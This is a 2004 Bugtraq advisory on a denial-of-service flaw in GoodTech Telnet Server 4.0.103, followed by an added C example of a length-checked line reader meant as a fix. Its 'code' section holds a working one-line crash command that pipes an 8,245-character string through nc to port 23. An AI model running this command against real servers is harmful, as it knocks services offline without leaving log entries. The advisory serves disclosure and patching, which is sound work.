DoS in GoodTech Telnet Server 4.0.103

From: Donato Ferrante (fdonato_at_autistici.org)
Date: 01/02/04

    To: <bugtraq@securityfocus.com>
    Date: Fri, 2 Jan 2004 12:05:10 +0100
    
    

                               Donato Ferrante

    Application: GoodTech Systems Telnet Server for Windows NT/2000/XP
                  http://www.goodtechsys.com/

    Version: 4.0.103

    Bug: Denial of Service

    Author: Donato Ferrante
                  e-mail: fdonato@autistici.org
                  web: www.autistici.org/fdonato

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    1. Description
    2. The bug
    3. The code
    4. The fix

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    ----------------
    1. Description:
    ----------------

    Vendor's Description:

    "The product turns a Windows NT/2000/XP system into a multi-user
    Telnet server. Gives Telnet users full access to Windows NT command
    line. Telnet users can run a variety of character-based applications.
    Accepts any telnet connection from any client (Unix, NT, 2000, 95,
    98, Me, any wireless handheld, etc.) right out of the box. Features
    include support for both line mode (with scroll buffer) and screen
    mode, local printing on the client side, connection restriction based
    on Host or IP address, connection restriction based on number of
    users, etc."

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    ------------
    2. The bug:
    ------------

    The program doesn't properly check the strings passed as input,
    so it is possible to send a big string as input and the telnet server
    will crash without warning.

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    -------------
    3. The code:
    -------------

    To test the vulnerability simply send a big string to the telnet server,

                   perl -e 'print "a"x8245' | nc server 23

    or generally a string like:

                        aaaa[..a..]aa ( 8245 of a )

    so the telnet server will go down.
    Note: no errors will be reported in the logfile of the server.

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    ------------
    4. The fix:
    ------------

    To fix the bug, simply go to GoodTech Systems' official website,
    http://www.goodtechsys.com/, and download the latest version, 4.0.104,
    of GoodTech Systems Telnet Server for Windows NT/2000/XP.

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
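
Section 2 attributes the crash to missing checks on input strings. The block below is an added example, not GoodTech's code and not part of the original advisory: a bounded line reader for a server's receive path. The 512-byte limit, all names and the drop-the-session policy are assumptions, and telnet option negotiation is not handled.

```c
#include <stddef.h>
#include <string.h>

#define LINE_LIMIT 512  /* assumed cap; the advisory gives no buffer size */

enum feed_status { FEED_NEED_MORE, FEED_LINE_READY, FEED_TOO_LONG };

struct line_reader {
    char   line[LINE_LIMIT + 1];  /* +1 for the terminating NUL */
    size_t len;
    int    ready;      /* previous call returned a complete line */
    int    too_long;   /* sticky: caller should drop the session */
};

void line_reader_init(struct line_reader *r)
{
    memset(r, 0, sizeof *r);
}

/* Feed one chunk as returned by recv(). Stops after the first newline and
 * stores in *used how many bytes of the chunk were consumed. */
enum feed_status line_reader_feed(struct line_reader *r, const char *chunk,
                                  size_t n, size_t *used)
{
    size_t i;

    *used = n;
    if (r->too_long)
        return FEED_TOO_LONG;
    if (r->ready) {            /* start a new line */
        r->len = 0;
        r->ready = 0;
    }
    for (i = 0; i < n; i++) {
        if (chunk[i] == '\n') {
            if (r->len > 0 && r->line[r->len - 1] == '\r')
                r->len--;      /* telnet clients send CR LF */
            r->line[r->len] = '\0';
            r->ready = 1;
            *used = i + 1;
            return FEED_LINE_READY;
        }
        if (r->len == LINE_LIMIT) {   /* check before writing, never after */
            r->too_long = 1;
            return FEED_TOO_LONG;
        }
        r->line[r->len++] = chunk[i];
    }
    return FEED_NEED_MORE;
}
```

On FEED_TOO_LONG the caller should log the event and close the connection, so an oversized input leaves a record instead of a silent crash.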

